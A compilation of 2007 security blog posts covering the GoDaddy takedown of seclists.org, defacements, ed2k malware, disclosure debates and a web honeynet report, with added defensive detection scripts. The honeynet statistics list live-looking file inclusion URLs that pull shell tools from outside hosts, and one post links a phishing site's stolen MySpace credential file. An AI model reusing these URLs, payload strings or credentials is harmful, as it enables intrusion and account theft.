No Daddy, please stop! Fyodor’s words.

So after the takedown of seclists.org, and all the different points of view being aired on the various web sites, I decided to contact Fyodor and ask him exactly what happened, and what is going to happen in the future in regard to godaddy.com. Once again, thanks to Fyodor for taking the time to answer my questions.
The following is taken from an interview that I did with Fyodor last night, so here it is:

In your words, could you please describe what happened to
seclists.org? I know that you have probably been asked this countless
times, but there are also countless sites that don’t mention your
point of view. Also, on these same sites, some are saying that you
had 60 seconds warning, others are saying 60 minutes; what’s the
exact figure?

Basically, GoDaddy suspended one of the domain names I had registered
with them based on a complaint by MySpace without giving me a chance
to respond or requiring any sort of court order from MySpace. GoDaddy
wasn’t even my ISP or web host. Policing web content of the 18
million domains in their registry is not their job. Worse, it was
extraordinarily hard and frustrating to reach them and get an actual
reason for the shutdown. I’ve described the shutdown in far more
detail at http://NoDaddy.Com .

As for the timing, they left me a voicemail at ’9:39:31 AM PST’
according to the time stamp from my voicemail provider. In the
voicemail, they say my domain is “scheduled for suspension”. Then at
’9:40:23′ (according to my time-synced mail server) they emailed me a
“Domain Suspension Notice” saying that my “domain names have been
suspended”. So they only gave me 52 seconds to respond to their
voicemail! Plus, their voicemail didn’t include a phone number to
reach them at! I have posted both the email and voicemail recording at
NoDaddy.Com.

GoDaddy nevertheless tried to claim that they gave me an hour of
notice. Their general counsel Christine Jones was caught by Wired in
that lie at
http://blog.wired.com/27bstroke6/2007/01/godaddy_defends.html .

Aside from nodaddy.com, do you plan on taking any action, namely
legal action, against godaddy.com?

They certainly deserve it, and some lawyers have offered to help. But
I haven’t even asked them for monetary restitution for the damage they
have caused — I just want them to change their policies to be more
customer-friendly. Or if they don’t, I want their behavior to be
well-known so that other consumers can make a better choice. So
unless they do something outrageous (such as suing me for speaking
out against them on NoDaddy.Com), I’m not presently planning any legal
action against GoDaddy.

Will you be taking any action against myspace.com because of this
atrocity at all?

I would cancel my account if I was pathetic enough to have one :) .
They should have contacted me directly to remove the page. My email
address and phone number were available on the public whois, and I also
watch the abuse@seclists.org email address for complaints about
illegal postings to the mailing lists. Ironically, GoDaddy shut down
the complaint email address when they shut down the whole domain
SecLists.org.

So while MySpace made a mistake by sending the request directly to
GoDaddy, I hold GoDaddy much more culpable for agreeing to the
outrageous domain.

How much of an impact do you feel this had on the security
community in general?

I hope it has raised awareness of the problem of vigilante domain
registrars hijacking their customers’ domains because they find the
web content objectionable. This isn’t just a security community
issue, but an issue for all web sites. Particularly those which
accept user-generated content such as forum posts or blog comments.
My whole domain was shut down with no notice or reason immediately
given based on a 3rd party post I had nothing to do with.

How much of an impact has this had on your life?

It has kept me very busy for the last week. But I’m hoping it will
calm down so I can return to focusing the majority of my time to
maintaining Nmap and my web sites.

I know that it mentions this on nodaddy.com, but what can people
do to help on the nodaddy.com site?

The site is meant to be a community effort, so help is appreciated.
Here are some ideas:

o Forum Operator — If someone wants to start a web forum system where
users can post their GoDaddy horror stories and seek advice, that
would be useful. We would be happy to provide a subdomain such as
forums.nodaddy.com for this.

o Webmaster help — If someone wants to help maintain the site content
(post new news stories, etc.), I would be happy for the help. They
need to know (or learn to use) the Subversion version detection system.

o Creative content, like cartoons, pictures for the “NoDaddy Girls”
contest, etc. The point of the site is to spread the word about
GoDaddy abuses, but also to have fun :) .

Last but not least, any new and exciting things coming along in the
next release of nmap that you’d be willing to share?

We are very excited about a new scripting language, which is already
in alpha stage. You can see our writeup here:

http://insecure.org/nmap/nse/

Also, we have received tons of user OS submissions for the second
generation OS detection system http://insecure.org/nmap/osdetect/,
so the next release should work even better in that respect.

Coca-Cola Singapore, Nokia Canada defaced

The news portal of Coca-Cola Singapore is the target of a recent defacement. The attacker’s signature is still present on the Windows 2003/IIS6 server.

It appears that the home page of Coca-cola.com.sg was a target in 2003 too.

Another global company attacked recently is Nokia Canada. Their web site www.nokia.ca/english/index.asp was offline on Monday, but some screenshots have been posted online. One of the weblogs reporting this case is Nokia Insider; the related entry was posted by ‘Nokia’. ;-)

The target page was the phone comparison page of Nokia.ca.

Canada, UK etc. seeking tax cheats with special Web crawler

This Wired news article reports that

A five-nation tax enforcement cartel has been quietly cracking down on suspected internet tax cheats, using a sophisticated web crawling program to monitor transactions on auction sites, and track operators of online shops, poker and porn sites.

The countries participating in this Xenon project are Austria, Canada, Denmark, the Netherlands and the United Kingdom. They are co-operating with the Amsterdam-based data mining company Sentient Machine Research.

A very interesting detail is that the crawling is deliberately very “slow”, so that it does not stand out in server logs!
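A crawler that spreads its requests over days never shows up in the per-hour or per-day views most log tooling presents. The defender’s counter is to profile each client over the whole retention window and look at page coverage rather than rate. The following Python is an added example written for this post, not code from the article or from the Xenon project; the traffic, client addresses (RFC 5737 documentation ranges) and thresholds are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample traffic: (client_ip, timestamp, path). The IPs are RFC 5737
# documentation addresses and the paths are made up; nothing here comes from the article.
def build_sample_requests():
    reqs = []
    t0 = datetime(2007, 1, 1, 0, 0, 0)
    # a "slow" crawler: one new listing page roughly every three hours for a week
    for i in range(56):
        reqs.append(("198.51.100.10", t0 + timedelta(hours=3 * i), f"/listing/{i}"))
    # a normal visitor: eight pages in ten minutes, some of them repeated
    for i, p in enumerate(["/", "/listing/1", "/listing/2", "/", "/cart", "/listing/2", "/login", "/"]):
        reqs.append(("203.0.113.5", t0 + timedelta(minutes=i), p))
    # a noisy crawler: 200 distinct pages in one hour, obvious in any hourly report
    for i in range(200):
        reqs.append(("192.0.2.77", t0 + timedelta(seconds=18 * i), f"/listing/{i}"))
    return reqs

def profile_clients(requests):
    """Per-client coverage and request rate measured over the whole observation window."""
    per_ip = defaultdict(list)
    for ip, ts, path in requests:
        per_ip[ip].append((ts, path))
    profiles = {}
    for ip, hits in per_ip.items():
        times = sorted(ts for ts, _ in hits)
        # floor the span at one hour so a short burst is not divided by near-zero
        span_hours = max((times[-1] - times[0]).total_seconds() / 3600.0, 1.0)
        profiles[ip] = {
            "requests": len(hits),
            "distinct_paths": len({p for _, p in hits}),
            "span_hours": span_hours,
            "per_hour": len(hits) / span_hours,
        }
    return profiles

def low_and_slow_clients(requests, min_distinct_paths=40, max_per_hour=2.0, min_span_hours=24.0):
    """Clients that cover many distinct pages at a rate too low to stand out in hourly or daily views."""
    flagged = {}
    for ip, prof in profile_clients(requests).items():
        if (prof["distinct_paths"] >= min_distinct_paths
                and prof["per_hour"] <= max_per_hour
                and prof["span_hours"] >= min_span_hours):
            flagged[ip] = prof
    return flagged

if __name__ == "__main__":
    for ip, prof in low_and_slow_clients(build_sample_requests()).items():
        print(ip, prof)
```

The thresholds are assumptions to tune per site: the point is that the slow client is invisible to any rate-based check (well under one request per hour) and only appears when distinct-path coverage is accumulated across the full window.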

Fyodor only gets 60 seconds warning?

Kevin Poulsen reports on the 27B Stroke 6 blog today that Fyodor’s (of nmap fame) SecLists.org website was shut down. Kevin followed up later with responses both from GoDaddy’s general counsel and Fyodor. Please take a look at Kevin’s writeups. He does an excellent job, as always.

Basically, Fyodor keeps a public archive of a bunch of mailing lists, including Full Disclosure. Someone by the address of alex323@gmail.com posted a copy of a myspace password list to Full Disclosure. Fyodor’s archive contained a copy. And so does every other archive, and every single one of us who subscribes directly has a copy, too.

Depending on whose story you believe, Fyodor was given either 1 minute or 1 hour of notice before they turned him off. We don’t know how long it was between when myspace asked and GoDaddy acted. Fyodor never got the message ahead of time, and GoDaddy made no attempt to ask for removal of the single attachment out of thousands and thousands of archived emails. And the password list had been there for days.
I belong to a couple of private groups that request domain shutdowns frequently, based on phishing sites, botnet C&Cs, and sites hosting malware being used to infect new victims. These are what I would tend to call legitimate reasons to shut down a domain. How long do you think it usually takes the group to have a domain shut down? Even for the most responsive registrars, it frequently takes several hours. How do we get the 1 minute turnaround, GoDaddy? Where’s the form we fill out?

So, no brownie points for GoDaddy and how they handled this. We can see who they are willing to jump for. How about myspace? I think Fyodor’s own response is about as good as it gets. Just change the passwords on the compromised list, and notify the account owners.

So I have a question: If you know someone whose password was stolen, have they received any kind of notification? I suppose if I were a bit more enterprising, I could just mail them all and ask myself, or maybe just try the names and password on myspace, and see how many still work. After all, I’ve got a copy of the list, there’s nothing that would prevent me.

Apple: We have a fix for MOAB-01-01-2007!

Apple has released a fix for QuickTime rtsp:// URL Handler Stack-based Buffer Overflow – aka MOAB-01-01-2007.

No other fixes are included in Security Update 2007-001; the link is here:

docs.info.apple.com/article.html?artnum=304989

As we can see, ‘MOAB-01-01-2007’ was disclosed on 1st Jan as the very first Month of Apple Bugs advisory.

It is worth noting that Windows versions 7.1.3.100 and below are affected too.

Best,
Juha-Matti Laurio

Distributing malware over ed2k network

While searching for some legitimate content on the ed2k p2p network I stumbled onto some strange search results. Those results looked as if they had been forged from the search query. I then searched for files that certainly do not exist and got the same forged results.

A quick check of the files shows that at least one of them contains malware.

The malicious server forges an ed2k link for every query, changing only the name of the file while the MD5 remains the same. The malicious server then connects to one of the biggest servers in the network. Users who use Global search (trans-server) will receive the link on almost every search, and the result may look very legitimate because the file appears to be so widely available. The malicious files are very well shared and will be downloaded in a matter of seconds.
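The two observations above (the same hash coming back under a filename that merely echoes each query, and a nonsense query still returning results) are exactly what a client can check for. The following Python is an added example for this post, not code from the original or from any ed2k client; the search responses, hashes and source counts are constructed, and the nonsense "canary" query mirrors the author’s test of searching for a file that certainly does not exist.

```python
from collections import defaultdict

# Constructed search responses: (query, filename, file_hash, size_bytes, sources).
# Hashes, names and counts are made up for the example. The forged entry reuses one
# hash under a name copied from whatever was searched for.
SAMPLE_RESULTS = [
    ("ubuntu iso",   "ubuntu iso.zip",                "aa" * 16,   1_234_567, 950),
    ("ubuntu iso",   "ubuntu-6.10-desktop-i386.iso",  "bb" * 16, 733_906_944,  41),
    ("linux kernel", "linux kernel.zip",              "aa" * 16,   1_234_567, 950),
    ("linux kernel", "linux-2.6.19.tar.bz2",          "cc" * 16,  43_111_123,  17),
    ("holiday pics", "holiday pics.zip",              "aa" * 16,   1_234_567, 950),
    ("xq7z9k2vqpl",  "xq7z9k2vqpl.zip",               "aa" * 16,   1_234_567, 950),
]

def canary_hashes(results, canary_query):
    """Hashes returned for a query that cannot legitimately match any shared file."""
    return {h for q, _, h, _, _ in results if q == canary_query}

def suspicious_hashes(results, min_queries=3):
    """Hashes advertised under many names that simply echo unrelated queries."""
    by_hash = defaultdict(lambda: {"queries": set(), "names": set()})
    for q, name, h, size, _ in results:
        by_hash[(h, size)]["queries"].add(q)
        by_hash[(h, size)]["names"].add(name)
    flagged = {}
    for (h, size), info in by_hash.items():
        # a genuine file keeps a stable name; a forged one is renamed to match each query
        echoes = sum(1 for q in info["queries"] for n in info["names"] if n.startswith(q))
        if len(info["queries"]) >= min_queries and echoes >= min_queries:
            flagged[h] = sorted(info["queries"])
    return flagged

def filter_results(results, canary_query, min_queries=3):
    """Drop every result whose hash was returned for the canary or flagged as query-echoing."""
    bad = canary_hashes(results, canary_query) | set(suspicious_hashes(results, min_queries))
    return [r for r in results if r[2] not in bad]

if __name__ == "__main__":
    print("forged:", suspicious_hashes(SAMPLE_RESULTS))
    for r in filter_results(SAMPLE_RESULTS, "xq7z9k2vqpl"):
        print("kept:", r[1])
```

The canary check alone is enough when you control the queries; the hash-grouping check catches the same forgery passively from results you were going to receive anyway, because the forged entry’s hash and size never change while its name does.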

Google, Service Providers and the Future of P2P

in a non-operational nanog discussion about google bandwidth uses, several statements were made. it all started from the following post by mark boolootian:

> cringley has a theory and it involves google, video, and oversubscribed backbones:
> http://www.pbs.org/cringely/pulpit/2007/pulpit_20070119_001510.html

in the discussion, the following statement was made by rodrick brown:

> the following comment has to be one of the most important comments in
> the entire article and its a bit disturbing.
>
> “right now somewhat more than half of all internet bandwidth is being
> used for bittorrent traffic, which is mainly video. yet if you
> surveyed your neighbors you’d find that few of them are bittorrent
> users. less than 5 percent of all internet users are presently
> consuming more than 50 percent of all bandwidth.”

from there it went down-hill with discussion of the future, with the venice project (streaming p2p for tv), etc. being mentioned. some points were raised about how isps currently fight p2p technologies and may fight these new worlds of functionality, denying what the users want rather than work with them, citing as we have seen above that today, a very small percentage of internet users account for about 50% of all internet traffic. that of course, will increase dramatically in the future — it is where the users want to go.

the isps inhibit this progress, just like in my opinion a bad security “guy” or “gal” would try to prevent functionality from their users as part of their security strategy, rather than work with their users and enable functionality first.

in this discussion, randy bush (who i have had my share of strong disagreements with in the past) said the following, which is admirable:

> the heavy hitters are long known. get over it.
>
> i won’t bother to cite cho et al. and similar actual measurement
> studies, as doing so seems not to cause people to read them, only to say
> they already did or say how unlike japan north america is. the
> phenomenon is part protocol and part social.
>
> the question to me is whether isps and end user borders (universities,
> large enterprises, …) will learn to embrace this as opposed to
> fighting it; i.e. find a business model that embraces delivering what
> the customer wants as opposed to whinging and warring against it.
>
> if we do, then the authors of the p2p protocols will feel safe in
> improving their customers’ experience by taking advantage of
> localization and proximity, as opposed to focusing on subverting
> perceived fierce opposition by isps and end user border fascists. and
> then, guess what; the traffic will distribute more reasonably and not
> all sum up on the longer glass.

it has been a long time since i bowed before mr. bush’s wisdom, but indeed, i bow now in a very humble fashion.

thing is though, it is equivalent to one or all of the following:
-. eff-like thinking (sticking to the moral high-ground or (at times!) impractical concepts; stuff to live by).
-. (very) forward thinking (not yet possible for people to get behind – by people i mean those who do this daily), likely to encounter much resistance until it becomes mainstream a few years down the road.
-. not connected with what can currently happen to effect change, but rather with how things really are, which people can not yet accept.

as randy is obviously not much affected when people disagree with him (much the same as me), nor should he be, i am sure he will preach this until it becomes real. with that in mind, if many of us believe this is a philosophical as well as a technological truth — what can be done today to effect this change?

the service providers are not evil — they do this out of operational necessity and business needs. how can this change, or be shown to be wrong?

some examples may be:
-. working with network gear vendors to create better equipment built to handle this and lighten the load.
-. working on establishing new standards and topologies to enable both vendors and providers to adopt them.
-. presenting case studies after putting our money where our mouth is, and showing how we made it work in a live network.

staying in the philosophical realm is more than respectable, but waiting for fussp-like wide-adoption or for sheep to fly is not going to change the world, much.

for now, the p2p folks who in most cases are not eveel “internet pirates”, are mostly allied whether in name or in practice with illegal activities. the technology isn’t illegal and can be quite good for all of us to save quite a bit of bandwidth rather than waste it (quite a bit of redundancy there!).

so, instead of fighting progress and seeing it [p2p technology] left in the hands of the “pirates” and the privacy folks trying to bypass the firewall of [insert evil regime here], why not utilize it?

how can service providers make use of all this redundancy among their top talkers and remove the privacy advocates and warez freaks from the picture, leaving that front with less technology and legitimacy while helping themselves?

this is a pure example of a problem from the operational front [realm] which can be floated to research and the industry, with smarter solutions than port blocking and qos.

it’s about progress and how change is effected and feared, not about who is evil. it is about who will step up and make a difference, and whether business today is smart enough to lead the road rather than adapt after the avalanche has already fallen.

gadi evron,
ge@beyondsecurity.com.

What’s the deal?

in the past week or two, the anti phishing community has been buzzing with this. now it is public and i can finally shout my frustration:
so, we have phishing sites which are doing man-in-the-middle in real time, between the phished site and the phished user.
how is that news?

regular phishing works like so:
victim >> fake site >> real site

middle, see?

now, in most cases in the past, this process was not automatic, and in most cases it won’t be: distribution across ip addresses, choosing which accounts are worth stealing from, choosing money mules, etc. is far easier to do off-line.
that said, this isn’t new, it’s just… yet another kit. am i excited about a new kit? kinda. is this big news? no.

why, you ask? because real-time phishing using mitm attacks has been happening for years now using phishing or banking trojan horses. the best way to describe what happened is that the technique has now been incorporated into older email-based phishing as well.

new? okay, maybe if we push it. exciting? so-so.

gadi evron,
ge@beyondsecurity.com.

Cross-site Request Forgery FAQ released

Cgisecurity has announced the release of the Cross-site Request Forgery FAQ document today.

According to their posting it was released

to address some of the common questions and misconceptions regarding this commonly misunderstood web flaw.

They list both the CSRF and XSRF abbreviations on the main page.

Myspace phishing site discloses countless usernames and passwords

This just came in on FD, and I’d suggest that anyone reading this checks to make sure that no one they know got fooled by this one.

The phishing site can be found at http://www.marcolano.com/login

All the usernames and passwords can be found here http://www.marcolano.com/login/myspace.txt

I’ve also submitted this to digg.com as it may help to get the word out there a bit more; if nothing else, maybe the digg effect will take the site down before the law can. Here’s the link:

http://www.digg.com/security/Change_your_Myspace_passwords_now

Two infosec veterans weigh in on Full Disclosure

Marcus J Ranum (MJR) says (http://www2.csoonline.com/exclusives/column.html?CID=28072)

“After 10 years of full disclosure, security has not gotten any better”.

First off, how would we know what security would have been like without full disclosure? Perhaps it could have been said that security would have gotten exponentially (or even linearly) worse. In which case, statements like “security hasn’t gotten any better” and “the number of vulnerabilities is pretty much constant” would imply that full disclosure works? But, wait, that presupposes that only one factor contributes to the state of security – which is a logical fallacy as well. Hmmm, ok. I can’t draw any logical conclusions here. Let’s go to Bruce’s argument.

Bruce says: (http://www2.csoonline.com/exclusives/column.html?CID=280723)

“Bugs exist whether or not they are disclosed in a public forum. Vendors are more responsive when it could cause bad PR. Public disclosure forces vendors to more quickly fix flaws which makes systems more secure”.

Bruce’s argument logically implies that with full disclosure we have a *potential* for better system security. Unfortunately, we can’t measure the rate at which these fixes actually get deployed and we can’t measure the rate at which crackers use publicly disclosed bugs to exploit unpatched systems. So, at the end of the day, I can’t say whether or not public disclosure actually helps the end user. I can say that public disclosure at least creates a Potential ™ for better system security….and, that’s something.

A good portion of MJR’s article is devoted to the lambasting of security researchers. Some quotes:

‘For longer than a decade, we’ve lived under the mob rule, where for some security consultants and companies, “marketing” has been replaced by “splashily announcing holes in commercial products to get 20 seconds of fame on CNN.” ‘

‘Now that we can look back at 10 years of what disclosure has brought us, it’s brought us…well, nothing much. Nothing much, that is, except a grey-market economy in exploits, where independent “vulnerability researchers” attempt to cash in by finding new attacks that they can sell to security companies or spyware manufacturers—whichever bids higher. Nothing much unless you count the massive amounts of “free” marketing exposure for companies that trade in exploits.’

‘The state of ethics in the computer security industry is pathetic; it’s on par with where medicine was in the 1820s—except that some of the snake-oil salesmen in the 1820s actually believed in their products.’

‘Those of you who are playing the disclosure game are just playing for your two minutes of fame: You’re not making software better. Sure, some of you work for consultancies and startups, and it saves you a ton of money by not having to have a marketing budget, but isn’t shouting “fire!” in a crowded theater so…um, ’90s? I know that the typical security customer is (to you) an unsophisticated rube, but that does not justify you placing them at increased risk just so you can publish a new signature for your pen-testing tool or get your funny-haired “chief hacking officer” on CNN one more time. ‘

‘Unfortunately, if you look at the last 10 years of security, it’s a litany of “one step forward, one step back,” thanks in part to the vulnerability pimps, parasites and snake-oil salesmen who flocked into the industry when they smelled money and a chance to get some attention. ‘

I think I see a little bias creeping in here and perhaps even a bit of hypocrisy.
Marcus abhors the hacker/security-researcher type. I don’t know if he hates that they are getting attention that is undue, that they are making money off the attention, or that he isn’t getting the attention that he once did. At any rate, it’s getting damn old. The guy that shouts “fire” may very well be annoying. The guy that jumps up and down shouting “Hey, he’s shouting fire” is equally annoying.
In the past, MJR has been spot-on with his analysis. Now, his ‘analysis’ seems as much a PR-trolling rant as any of the mob that he is criticizing. And, let’s not forget that Marcus gets paid by a company that discloses holes in major products and perhaps benefits from the free ‘marketing’. I bet no one is inviting this motherfucker to the company barbecue ;-)

Anonymous

Disclosure of the week (2): Excel opcode vuln

There are many ways to disclose vulnerabilities.

This is the Fortinet Security Research Team way:

1. Release FortiGuard Advisory FGA-2006-30 when MS07-002 is not yet public
2. Include references to Microsoft Security Bulletin 927198 and CVE-2006-3432, which do not exist and are not accessible
3. Publish an advice to “apply the update provided by Microsoft”
4. Wait for MS January security updates
5. Ignore FGA-2006-30 and generate redirection to FGA-2007-01
6. Change Microsoft Security Bulletin reference to MS07-002 and CVE name to CVE-2007-028, with three digits in ’0028′
7. Don’t release any revision history or information about new CVE name or about removed 2006-30 advisory
8. Wait and see whether users notice the way you act

Update: According to Google’s cache, this advisory, for example, was released.

Disclosure of the week (1): Opera 9.10

There are many ways to disclose vulnerabilities.

This is the Opera Software way:

1. Release new 9.10 version of the browser (Dec 18th ’06)
2. Don’t publish any information in the Security section of official changelog
3. Check if iDefense will release their related advisories
4. Release two knowledge base advisories
5. Update the changelog with no revision history or Last Updated date
6. Wait and see whether users notice the way you act

Oracle started MS-style advance notification

Oracle has reported that it plans to release fixes for 52 security vulnerabilities on Tuesday 16th January. The notification is part of a new program to help database administrators. The Redmond guys have been announcing their upcoming security bulletins in advance since late 2004.

Oracle’s so-called Pre-Release Announcement is located at

oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html.

One of the interesting details is that

The highest CVSS base score of vulnerabilities across all products is 7.0.

[CVSS link added by the author]

Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos into attack platforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside from research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves, to be made available to operational folks so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (and quite loudly – me) have been warning about this for a while; now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com ).

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), …
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), http://m embers.lycos.co.uk/onuhack/injek.txt? (6), http://m embers.lycos.co.uk/onuhack/cmd.do? (2)
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)
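The statistics above come straight out of web server logs: a file inclusion attempt is a request whose query string carries a full URL, and the fetched tool is almost always written as "http://host/tool.txt?" so that the trailing "?" swallows whatever the vulnerable script appends. A hosting operator can produce the same per-source report from ordinary access logs. The Python below is an added example for this post, not the web honeynet project’s own tooling; the log lines, client addresses (RFC 5737 ranges) and include URLs (reserved example hosts) are constructed and are not indicators from the report.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines. Client addresses are RFC 5737 documentation
# ranges and the remote-include URLs point at reserved example hosts; none are real IoCs.
SAMPLE_LOG = """\
198.51.100.23 - - [10/Jan/2007:03:12:01 +0000] "GET /index.php?page=http://malware.example/cmd1.do? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Jan/2007:03:12:05 +0000] "GET /modules/x/mod.php?inc=http://malware.example/injek.txt? HTTP/1.1" 200 2048 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Jan/2007:03:12:09 +0000] "GET /index.php?page=http://malware.example/injek.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Jan/2007:04:40:17 +0000] "GET /admin/cmd.php?f=http://203.0.113.200/administrator/cmd.gif? HTTP/1.0" 200 77 "-" "Mozilla/4.0"
192.0.2.8 - - [10/Jan/2007:05:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "http://example.invalid/" "Mozilla/5.0"
192.0.2.8 - - [10/Jan/2007:05:01:04 +0000] "GET /go.php?url=https://example.invalid/doc.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def remote_includes(line):
    """Return (ip, [urls]) for a log line whose query string carries a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    urls = [v for _, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]
    return (m.group("ip"), urls) if urls else None

def rfi_report(log_text, require_trailing_query=True):
    """Per-source hit counts and included-URL counts, in the shape of the project's statistics."""
    hits = Counter()
    payloads = defaultdict(Counter)
    for line in log_text.splitlines():
        found = remote_includes(line)
        if not found:
            continue
        ip, urls = found
        # tools fetched for inclusion end in "?" so the script's appended suffix is ignored;
        # a legitimate redirect parameter (the last sample line) normally does not
        if require_trailing_query:
            urls = [u for u in urls if u.endswith("?")]
        if not urls:
            continue
        hits[ip] += 1
        for u in urls:
            payloads[ip][u] += 1
    return {ip: {"hits": n, "malware": dict(payloads[ip])} for ip, n in hits.items()}

def format_report(report):
    """Render the report as the same pipe-separated table the project publishes."""
    lines = ["ip | hit count | malware (count), ..."]
    for ip, info in sorted(report.items(), key=lambda kv: -kv[1]["hits"]):
        urls = ", ".join(f"{u} ({c})" for u, c in sorted(info["malware"].items()))
        lines.append(f"{ip} | {info['hits']} | {urls}")
    return "\n".join(lines)

if __name__ == "__main__":
    print(format_report(rfi_report(SAMPLE_LOG)))
```

With the trailing-"?" requirement switched off the same code also lists the open-redirect style request from 192.0.2.8, which is the trade-off between catching includes that omit the "?" and drowning the report in benign URL-carrying parameters; the per-URL counts are what you would hand to operational folks, since the included file is the thing worth blocking at the egress proxy regardless of which compromised host is doing the fetching.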

The Bank of America: Please lower your defenses, we’re coming through

I wrote about how the Bank of America is conditioning its customers to be more susceptible to phishing.

It seems they are actually trying to break a record here (or else their security guy quit and was replaced by a marketing person). I just got an email that said:

This email was sent to you by Bank of America. To ensure delivery to your inbox, please add bankofamerica@replies.em.bankofamerica.com to your address book or safe sender list.

My first assumption was that it was a phishing email – why on earth would the BoA legitimately try to convince me to open myself up to phishing? (After adding this address to my “safe sender list”, every phisher in the world would set it as their “from” address.) In fact, a friend made fun of me for thinking this was a legitimate email – clearly only phishers could think I’m that stupid. Unfortunately, it’s real – it was sent to an email address used only with the BoA and unknown to anyone else.

Sad indeed.